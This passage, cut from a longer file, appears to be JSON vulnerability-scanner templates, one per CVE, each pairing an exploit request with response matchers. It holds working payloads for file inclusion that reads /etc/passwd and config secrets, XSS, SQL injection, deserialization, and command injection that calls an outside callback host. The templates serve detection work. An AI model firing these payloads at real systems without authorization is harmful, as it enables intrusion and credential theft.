Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4223","info":{"name":"KR-Web <=1.1b2 - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0545","info":{"name":"ZeroShell <= 1.0beta11 Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"],"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2009-2015","info":{"name":"Joomla! MooFAQ 1.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1872","info":{"name":"Adobe Coldfusion <=8.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/CFIDE/wizards/common/_logintowizard.cfm?%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1151","info":{"name":"PhpMyAdmin Scripts - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /scripts/setup.php HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\naction=test&configuration=O:10:\"PMA_Config\":1:{s:6:\"source\",s:11:\"/etc/passwd\";}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1496","info":{"name":"Joomla! Cmimarketplace 0.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-0347","info":{"name":"Autonomy Ultraseek - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs.html?url=http://www.interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2009-3053","info":{"name":"Joomla! Agora 3.0.0b  - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-1558","info":{"name":"Cisco Linksys WVC54GCA 1.00R22/1.00R24 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm/file.cgi?next_file=%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-4679","info":{"name":"Joomla! Portfolio Nexus - Remote File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2009-2100","info":{"name":"Joomla! JoomlaPraise Projectfork  2.0.10 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2000-0114","info":{"name":"Microsoft FrontPage Extensions Check (shtml.dll)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/_vti_inf.html"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["_vti_bin/shtml.dll"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6222","info":{"name":"Joomla! ProDesk 1.0/1.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1061","info":{"name":"WordPress Sniplets <=1.2.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6172","info":{"name":"Joomla! Component RWCards 3.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-7269","info":{"name":"UC Gateway Investment SiteEngine v5.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api.php?action=logout&forward=http://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-6465","info":{"name":"Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webshell4/login.php?errcode=0&login=\\%22%20onfocus=alert(document.domain);%20autofocus%20\\%22&err=U"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\" onfocus=alert(document.domain); autofocus","Please enter login name &amp; password"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4764","info":{"name":"Joomla! <=2.0.0 RC2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2398","info":{"name":"AppServ Open Project <=2.5.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=confirm('xss')>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5487","info":{"name":"WordPress Core <4.7.1 - Username Enumeration","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/users/","{{BaseURL}}/?rest_route=/wp/v2/users/"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"name\":","\"avatar_urls\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"json","name":"usernames","json":[".[] | .slug",".[].name"],"part":"body"}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12583","info":{"name":"DokuWiki - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=<svg%20onload=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unable to parse at parameter \"<svg onload=alert(document.domain)>\".</div>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-9506","info":{"name":"Atlassian Jira IconURIServlet - Cross-Site Scripting/Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17043","info":{"name":"WordPress Emag Marketplace Connector 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/emag-marketplace-connector/templates/order/awb-meta-box.php?post=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9416","info":{"name":"Odoo 8.0/9.0/10.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/base_import/static/c:/windows/win.ini","{{BaseURL}}/base_import/static/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","status_code == 200"],"condition":"and"},{"type":"dsl","dsl":["contains(body, 'bit app support')","contains(body, 'fonts')","contains(body, 'extensions')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12617","info":{"name":"Apache Tomcat - Remote Code Execution","severity":"high"},"requests":[{"raw":["PUT /{{randstr}}.jsp/ HTTP/1.1\nHost: {{Hostname}}\n\n<% out.println(\"CVE-2017-12617\");%>\n","GET /{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["CVE-2017-12617"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9822","info":{"name":"DotNetNuke 5.0.0 - 9.3.0 - Cookie Deserialization Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /__ HTTP/1.1\nHost: {{Hostname}}\nAccept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01\nX-Requested-With: XMLHttpRequest\nCookie: dnn_IsMobile=False; DNNPersonalization=<profile><item key=\"name1: key1\" type=\"System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"><ExpandedElement/><ProjectedProperty0><MethodName>WriteFile</MethodName><MethodParameters><anyType xsi:type=\"xsd:string\">C:\\Windows\\win.ini</anyType></MethodParameters><ObjectInstance xsi:type=\"FileSystemUtils\"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[extensions]","for 16-bit app support"],"condition":"and"},{"type":"status","status":[404]}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18598","info":{"name":"WordPress Qards - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/qards/html2canvasproxy.php?url=https://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["console.log"]}]}]},{"id":"CVE-2017-12629","info":{"name":"Apache Solr <= 7.1 - XML Entity Injection","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","GET /solr/{{core}}/select?q=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22UTF-8%22%3F%3E%0A%3C!DOCTYPE%20root%20%5B%0A%3C!ENTITY%20%25%20remote%20SYSTEM%20%22https%3A%2F%2F{{interactsh-url}}%2F%22%3E%0A%25remote%3B%5D%3E%0A%3Croot%2F%3E&wt=xml&defType=xmlparser HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2017-7391","info":{"name":"Magmi 0.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/magmi/web/ajax_gettime.php?prefix=%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain);</script><"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11629","info":{"name":"FineCMS <=5.0.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?c=api&m=data2&function=%3Cscript%3Ealert(document.domain)%3C/script%3Ep&format=php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>p\u4e0d\u5b58\u5728"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000163","info":{"name":"Phoenix Framework - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?redirect=/\\interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*?)$"]}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15715","info":{"name":"Apache httpd <=2.4.29 - Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\n\n{{randstr_1}}\n\n------WebKitFormBoundaryKc8fBVDo558U4hbJ\nContent-Disposition: form-data; name=\"name\"\n\n{{randstr}}.php\\x0A\n------WebKitFormBoundaryKc8fBVDo558U4hbJ--\n","GET /{{randstr}}.php\\x0A HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip,deflate\nAccept: */*\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"{{randstr_1}}\")"]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-14186","info":{"name":"FortiGate FortiOS SSL VPN Web Portal - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/loginredir?redir=javascript:alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location=decodeURIComponent(\"javascript%3Aalert%28document.domain%29\""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12149","info":{"name":"Jboss Application Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /invoker/JMXInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/EJBInvokerServlet/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n","POST /invoker/readonly HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/octet-stream\n\n{{ base64_decode(\"rO0ABXNyABNqYXZhLnV0aWwuQXJyYXlMaXN0eIHSHZnHYZ0DAAFJAARzaXpleHAAAAACdwQAAAACdAAJZWxlbWVudCAxdAAJZWxlbWVudCAyeA==\") }}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ClassCastException"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-15944","info":{"name":"Palo Alto Network PAN-OS - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /esp/cms_changeDeviceContext.esp?device=aaaaa:a%27\";user|s.\"1337\"; HTTP/1.1\nHost: {{Hostname}}\nCookie: PHPSESSID={{randstr}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@start@Success@end@"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14537","info":{"name":"Trixbox 2.8.0 - Path Traversal","severity":"medium"},"requests":[{"raw":["POST /maint/index.php?packages HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n\nxajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages\n","GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nReferer: {{Hostname}}/maint/index.php?packages\nCookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-5631","info":{"name":"KMCIS CaseAware - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17731","info":{"name":"DedeCMS 5.7 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,md5({{num}}),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-10271","info":{"name":"Oracle WebLogic Server - Remote Command Execution","severity":"high"},"requests":[{"raw":["POST /wls-wsat/CoordinatorPortType HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soapenv:Envelope\n    xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n    <soapenv:Header>\n        <work:WorkContext\n            xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n            <java version=\"1.4.0\" class=\"java.beans.XMLDecoder\">\n                <void class=\"java.lang.ProcessBuilder\">\n                    <array class=\"java.lang.String\" length=\"3\">\n                        <void index=\"0\">\n                            <string>/bin/bash</string>\n                        </void>\n                        <void index=\"1\">\n                            <string>-c</string>\n                        </void>\n                        <void index=\"2\">\n                            <string>ping -c 1 {{interactsh-url}}</string>\n                        </void>\n                    </array>\n                    <void method=\"start\"/></void>\n            </java>\n        </work:WorkContext>\n    </soapenv:Header>\n    